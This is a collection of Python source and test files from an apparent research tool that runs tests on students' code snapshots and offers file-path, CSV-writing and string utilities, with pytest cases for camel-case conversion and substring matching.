def __get_user_folder_name_from_path(file: str) -> str:
task_folder = get_parent_folder(file)
return get_parent_folder_name(task_folder)
def run_tests(path: str) -> str:
"""
Run tests on all code snapshots in the data for the task.
Note: the enum class TASK (see consts.py file) must have the task key.
It also must match the name of the folder with test files in the resources/tasks_tests.
For example, if your task has key [my_key], you should add a new value into TASK const with value [my_key]
and add a new folder [my_key] with input and output files for tests in the resources/tasks_tests folder.
The test result is an array containing values for all tasks from the TASK enum class.
If the code snapshot is incorrect, then the value -1 is specified.
To deserialize this array of ratings, use the function unpack_tests_results from task_scoring.py.
To get the rate only for the current task use the calculate_current_task_rate function from plots/scoring_solutions_plots.py
For more details see
https://github.com/JetBrains-Research/task-tracker-post-processing/wiki/Data-processing:-find-tests-results-for-the-tasks
"""
log.info(f'Start running tests on path {path}')
output_directory = get_output_directory(path, consts.RUNNING_TESTS_OUTPUT_DIRECTORY)
files = get_all_file_system_items(path, tt_file_condition)
str_len_files = str(len(files))
log.info(f'Found {str_len_files} files to run tests on them')
files = filter_already_tested_files(files, output_directory)
str_len_files = str(len(files))
log.info(f'Found {str_len_files} files to run tests on them after filtering already tested')
tasks = TASK.tasks()
in_and_out_files_dict = create_in_and_out_dict(tasks)
for i, file in enumerate(files):
file_log_info = f'file: {str(i + 1)}/{str_len_files}'
log.info(f'Start running tests on {file_log_info}, {file}')
current_task = __get_task_by_ct_file(file)
if not current_task:
# We don't need to handle other files with tasks which are not in the TASK enum class
continue
data = pd.read_csv(file, encoding=consts.ISO_ENCODING)
language, data = __check_tasks_on_correct_fragments(data, tasks, in_and_out_files_dict, file_log_info,
current_task=current_task)
log.info(f'Finish running tests on {file_log_info}, {file}')
output_directory_with_user_folder = os.path.join(output_directory, __get_user_folder_name_from_path(file))
write_based_on_language(output_directory_with_user_folder, file, data, language)
return output_directory
```
#### File: main/util/file_util.py
```python
import os
import re
import pickle
import shutil
from shutil import copyfile
from typing import Callable, Any, List, Tuple, Type, Optional
import pandas as pd
from src.main.util.strings_util import contains_any_of_substrings
from src.main.util.consts import ACTIVITY_TRACKER_FILE_NAME, FILE_SYSTEM_ITEM, ATI_DATA_FOLDER, \
DI_DATA_FOLDER, ISO_ENCODING, LANGUAGE, UTF_ENCODING, EXTENSION, TASK
'''
To understand correctly these functions' behavior you can see examples in a corresponding test folder.
Also, the naming convention can be helpful:
folder_name -- just name without any slashes;
>>> EXAMPLE: folder_name for the last folder in 'path/data/folder/' is 'folder'
file_name -- similarly to the folder_name, but may contain its extension;
>>> EXAMPLE: file_name for the file 'path/data/file.csv' can be 'file.csv' or just 'file' (see get_file_name_from_path)
file, folder, directory -- contain the full path
extension -- we consider, that if extension is not empty, it is with a dot, because of os.path implementation;
If extension is passed without any dots, a dot will be added (for example, see change_extension_to)
parent_folder -- the second folder from the end of the path, no matter is there a trailing slash or not
>>> EXAMPLE: parent_folder for both 'path/data/file' and 'path/data/file/' is 'path/data'
'''
ItemCondition = Callable[[str], bool]
def remove_slash(path: str) -> str:
return path.rstrip('/')
def serialize_data_and_write_to_file(path: str, data: Any) -> None:
create_directory(get_parent_folder(path))
with open(path, 'wb') as f:
p = pickle.Pickler(f)
p.dump(data)
def deserialize_data_from_file(path: str) -> Any:
with open(path, 'rb') as f:
u = pickle.Unpickler(f)
return u.load()
def add_slash(path: str) -> str:
if not path.endswith('/'):
path += '/'
return path
# For getting name of the last folder or file
# For example, returns 'folder' for both 'path/data/folder' and 'path/data/folder/'
# You can find more examples in the tests
def get_name_from_path(path: str, with_extension: bool = True) -> str:
head, tail = os.path.split(path)
# Tail can be empty if '/' is at the end of the path
file_name = tail or os.path.basename(head)
if not with_extension:
file_name = os.path.splitext(file_name)[0]
elif get_extension_from_file(file_name) == EXTENSION.EMPTY:
raise ValueError('Cannot get file name with extension, because the passed path does not contain it')
return file_name
# Not empty extensions are returned with a dot, for example, '.txt'
# If file has no extensions, an empty one ('') is returned
def get_extension_from_file(file: str) -> EXTENSION:
return EXTENSION(os.path.splitext(file)[1])
def add_dot_to_not_empty_extension(extension: EXTENSION) -> str:
new_extension = extension.value
if extension != EXTENSION.EMPTY and not extension.value.startswith('.'):
new_extension = '.' + new_extension
return new_extension
# Todo: add tests
def add_suffix_to_file(file: str, suffix: str) -> str:
base, extension = os.path.splitext(file)
return f'{base}_{suffix}{extension}'
# If need_to_rename, it works only for real files because os.rename is called
def change_extension_to(file: str, new_extension: EXTENSION, need_to_rename: bool = False) -> str:
new_extension = add_dot_to_not_empty_extension(new_extension)
base, _ = os.path.splitext(file)
if need_to_rename:
os.rename(file, base + new_extension)
return base + new_extension
def get_parent_folder(path: str, to_add_slash: bool = False) -> str:
path = remove_slash(path)
parent_folder = '/'.join(path.split('/')[:-1])
if to_add_slash:
parent_folder = add_slash(parent_folder)
return parent_folder
# For given directory structure:
# /root
# -- /foo
# ---- /bar
# ------ /class_file.py
# -------- class A
# returns 'root.foo.bar'
def get_class_parent_package(clazz: Type[object]) -> str:
# For example from comment above, class_module is 'root.foo.bar.class_file'
class_module = clazz.__module__
# Cut everything after the last dot to get parent package:
return class_module.rsplit(sep='.', maxsplit=1)[0]
def get_parent_folder_name(path: str) -> str:
return get_name_from_path(get_parent_folder(path), False)
def get_original_file_name(hashed_file_name: str) -> str:
return '_'.join(hashed_file_name.split('_')[:-4])
def get_original_file_name_with_extension(hashed_file_name: str, extension: EXTENSION) -> str:
extension = add_dot_to_not_empty_extension(extension)
return get_original_file_name(hashed_file_name) + extension
def get_content_from_file(file: str, encoding: str = ISO_ENCODING, to_strip_nl: bool = True) -> str:
with open(file, 'r', encoding=encoding) as f:
content = f.read()
return content if not to_strip_nl else content.rstrip('\n')
# File should contain the full path and its extension
def create_file(content: str, file: str) -> None:
create_directory(os.path.dirname(file))
with open(file, 'w') as f:
f.write(content)
def is_file(file: str) -> bool:
return os.path.isfile(file)
def remove_file(file: str) -> None:
if is_file(file):
os.remove(file)
def remove_all_png_files(root: str, condition: Callable) -> None:
files = get_all_file_system_items(root, condition)
for file in files:
remove_file(file)
def does_exist(path: str) -> bool:
return os.path.exists(path)
def create_directory(directory: str) -> None:
os.makedirs(directory, exist_ok=True)
def remove_directory(directory: str) -> None:
if os.path.exists(directory):
shutil.rmtree(directory, ignore_errors=True)
# To get something like 'ati_239/Main_2323434_343434.csv'
def get_file_and_parent_folder_names(file: str) -> str:
return os.path.join(get_parent_folder_name(file), get_name_from_path(file))
def all_items_condition(name: str) -> bool:
return True
def __enum_item_condition(name: str, enum) -> bool:
for item in enum:
if item.value == name:
return True
return False
def language_item_condition(name: str) -> bool:
return __enum_item_condition(name, LANGUAGE)
def task_item_condition(name: str) -> bool:
return __enum_item_condition(name, TASK)
# To get all files or subdirs (depends on the last parameter) from root that match item_condition
# Can be used to get all task-tracker files, all data folders, etc.
# Note that all subdirs or files already contain the full path for them
def get_all_file_system_items(root: str, item_condition: ItemCondition = all_items_condition,
item_type: FILE_SYSTEM_ITEM = FILE_SYSTEM_ITEM.FILE) -> List[str]:
items = []
for fs_tuple in os.walk(root):
for item in fs_tuple[item_type.value]:
if item_condition(item):
items.append(os.path.join(fs_tuple[FILE_SYSTEM_ITEM.PATH.value], item))
return items
def extension_file_condition(extension: EXTENSION) -> ItemCondition:
def has_this_extension(name: str) -> bool:
return get_extension_from_file(name) == extension
return has_this_extension
# To get all task-tracker files
def tt_file_condition(name: str) -> bool:
return ACTIVITY_TRACKER_FILE_NAME not in name and extension_file_condition(EXTENSION.CSV)(name)
def contains_substrings_condition(substrings: List[str]) -> ItemCondition:
def contains_these_substrings(name: str) -> bool:
return contains_any_of_substrings(name, substrings)
return contains_these_substrings
def match_condition(regex: str) -> ItemCondition:
def does_name_match(name: str) -> bool:
return re.fullmatch(regex, name) is not None
return does_name_match
# To get all subdirs that contain ct and ati data
def data_subdirs_condition(name: str) -> bool:
return ATI_DATA_FOLDER in name or DI_DATA_FOLDER in name
# To get all subdirs that contain user data
def user_subdirs_condition(name: str) -> bool:
return 'user' in name
# To get path to the output directory that is near to the original folder
# and has the same name but with a suffix added at the end
def get_output_directory(folder: str, result_name_suffix: str) -> str:
output_directory_name = get_name_from_path(folder, False) + '_' + result_name_suffix
return os.path.join(get_parent_folder(folder), output_directory_name)
def create_folder_and_write_df_to_file(folder_to_write: str, file_to_write: str, df: pd.DataFrame) -> None:
create_directory(folder_to_write)
# Get error with this encoding=ENCODING on ati_225/153e12:
# "UnicodeEncodeError: 'latin-1' codec can't encode character '\u0435' in position 36: ordinal not in range(256)"
# So change it then to 'utf-8'
try:
df.to_csv(file_to_write, encoding=ISO_ENCODING, index=False)
except UnicodeEncodeError:
df.to_csv(file_to_write, encoding=UTF_ENCODING, index=False)
# To write a dataframe to the output_directory remaining the same file structure as it was before
# For example, for path home/task-tracker/data and file home/task-tracker/data/folder1/folder2/ati_566/file.csv
# the dataframe will be written to output_directory/folder1/folder2/ati_566/file.csv
def write_result(output_directory: str, path: str, file: str, df: pd.DataFrame) -> None:
# check if file is in a path, otherwise we cannot reproduce its structure inside of output_directory
if path != file[:len(path)]:
raise ValueError('File is not in a path')
path_from_output_directory_to_file = file[len(path):].lstrip('/')
file_to_write = os.path.join(output_directory, path_from_output_directory_to_file)
folder_to_write = get_parent_folder(file_to_write)
create_folder_and_write_df_to_file(folder_to_write, file_to_write, df)
# To write a dataframe to the output_directory based on the language and remaining only the parent folder structure
# For example, for file path/folder1/folder2/ati_566/file.csv and python language the dataframe will be
# written to output_directory/python/ati_566/file.csv
def write_based_on_language(output_directory: str, file: str, df: pd.DataFrame,
language: LANGUAGE = LANGUAGE.PYTHON.value) -> None:
folder_to_write = os.path.join(output_directory, language.value, get_parent_folder_name(file))
file_to_write = os.path.join(folder_to_write, get_name_from_path(file))
create_folder_and_write_df_to_file(folder_to_write, file_to_write, df)
def pair_in_and_out_files(in_files: list, out_files: list) -> List[Tuple[str, str]]:
pairs = []
for in_file in in_files:
out_file = re.sub(r'in(?=[^in]*$)', 'out', in_file)
if out_file not in out_files:
raise ValueError(f'List of out files does not contain a file for {in_file}')
pairs.append((in_file, out_file))
return pairs
def sort_files_by_size(files: List[str], to_reverse: bool = False) -> List[str]:
files.sort(key=lambda f: os.stat(f).st_size, reverse=to_reverse)
return files
def get_file_with_max_size(files: List[str]) -> Optional[str]:
if not files:
return None
return sort_files_by_size(files, to_reverse=True)[0]
def copy_file(src: str, dst: str) -> None:
if is_file(src):
create_directory(get_parent_folder(dst))
copyfile(src, dst)
```
#### File: main/util/math_util.py
```python
import logging
from typing import Optional, Any, List
from statistics import median, StatisticsError
from src.main.util.consts import LOGGER_NAME
log = logging.getLogger(LOGGER_NAME)
def get_safety_median(values: List[Any], default_value: Optional[Any] = None) -> Optional[Any]:
try:
return median(values)
except StatisticsError:
log.info(f'Have gotten empty list to calculate median. Return default value:{default_value}')
return default_value
```
#### File: main/util/strings_util.py
```python
import re
from typing import List
def add_symbol_to_begin(string: str, symbol: str) -> str:
if not string.startswith(symbol):
string = symbol + string
return string
def contains_any_of_substrings(string: str, substrings: List[str]) -> bool:
for substring in substrings:
if substring in string:
return True
return False
def convert_camel_case_to_snake_case(string: str) -> str:
words = re.findall(r'[A-Z]?[a-z]+|[A-Z]{1,}(?=[A-Z][a-z]|\d|\W|$|_)|\d+\.\d+|\d+', string)
return '_'.join(map(str.lower, words))
def crop_string(string: str, short_part_length: int, separator: str = '...') -> str:
return ''.join((string[:short_part_length], separator, string[-short_part_length:]))
```
#### File: task_scoring/tasks_tests_handler/util.py
```python
import os
import logging
from enum import Enum
from typing import Dict, Tuple
from src.main.util import consts
from src.main.util.consts import TASK, LANGUAGE
from src.main.util.consts import TEST_DATA_PATH
from src.main.util.file_util import get_content_from_file
from src.main.task_scoring.task_checker import remove_compiled_files, FilesDict
from src.main.task_scoring.tasks_tests_handler import check_tasks, create_in_and_out_dict
log = logging.getLogger(consts.LOGGER_NAME)
class SOLUTION(Enum):
FULL = "full"
PARTIAL = "partial"
WRONG = "wrong"
ERROR = "error"
def get_actual_rate(task: TASK, language: consts.LANGUAGE, code: str, in_and_out_files_dict: FilesDict) -> float:
return check_tasks([task], code, in_and_out_files_dict, language, False)[0]
def get_source_code(task: TASK, language: consts.LANGUAGE, solution: str) -> str:
return get_content_from_file(os.path.join(TEST_DATA_PATH, "task_scoring/tasks_tests_handler", task.value,
language.value, solution + ".txt"))
def run_test_task(task: TASK, expected_pairs: Dict[SOLUTION, Tuple[int, int]], language: LANGUAGE) -> None:
remove_compiled_files()
in_and_out_files_dict = create_in_and_out_dict(TASK.tasks())
for s in SOLUTION:
code = get_source_code(task, language, s.value)
expected_pair = expected_pairs[s.value]
expected_rate = expected_pair[1] / expected_pair[0]
actual_rate = get_actual_rate(task, language, code, in_and_out_files_dict)
assert expected_rate == actual_rate, \
f'Actual rate for task {task}, language {language}, solution {s} is wrong, code:\n{code}. ' \
f'Expected rate = {expected_rate}. Actual rate = {actual_rate}'
```
#### File: util/strings_util/camel_case_to_snake_case_test.py
```python
from typing import Tuple
import pytest
from src.test.test_config import to_skip, TEST_LEVEL
from src.main.util.strings_util import convert_camel_case_to_snake_case
data = [('considerMeAsOneWhoLovedPoetryAndPersimmons', 'consider_me_as_one_who_loved_poetry_and_persimmons'),
('ResponseHTTP23', 'response_http_23'),
('maxDigit', 'max_digit'),
('max3', 'max_3'),
('already_snake_case', 'already_snake_case'),
('pies', 'pies'),
('WRITE_TASK', 'write_task'),
('', ''),
('13.0', '13.0'),
('IAm11.0YearsOld', 'i_am_11.0_years_old'),
('aB', 'a_b')]
@pytest.mark.skipif(to_skip(current_module_level=TEST_LEVEL.UTIL), reason=TEST_LEVEL.UTIL.value)
class TestConversionToSnakeCase:
@pytest.mark.parametrize('d', [_ for _ in data])
def test_upper_letters(self, d: Tuple[str, str]) -> None:
camel_case, snake_case = d
converted_snake_case = convert_camel_case_to_snake_case(camel_case)
assert snake_case == converted_snake_case, f'{converted_snake_case} is not equal {snake_case}'
```
#### File: util/strings_util/containing_substrings_test.py
```python
from typing import Callable, Tuple, List
import pytest
from src.test.test_config import to_skip, TEST_LEVEL
from src.main.util.strings_util import contains_any_of_substrings
string = 'Roses are red, violets are blue, sugar is sweet, and so are you'
contained_substrings = ['red', 'blue']
partly_contained_substrings = ['mint', 'candy', 'sugar']
not_contained_substrings = ['parsley', 'sun']
@pytest.mark.skipif(to_skip(current_module_level=TEST_LEVEL.UTIL), reason=TEST_LEVEL.UTIL.value)
class TestContainingSubstrings:
@staticmethod
@pytest.fixture(scope="function",
params=[
(contained_substrings, True),
(partly_contained_substrings, True),
(not_contained_substrings, False)
])
def param_contained_substrings_test(request) -> Tuple[List[str], bool]:
return request.param
def test_contained_substrings(self, param_contained_substrings_test: Callable) -> None:
(in_data, expected_res) = param_contained_substrings_test
assert contains_any_of_substrings(string, in_data) == expected_res
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.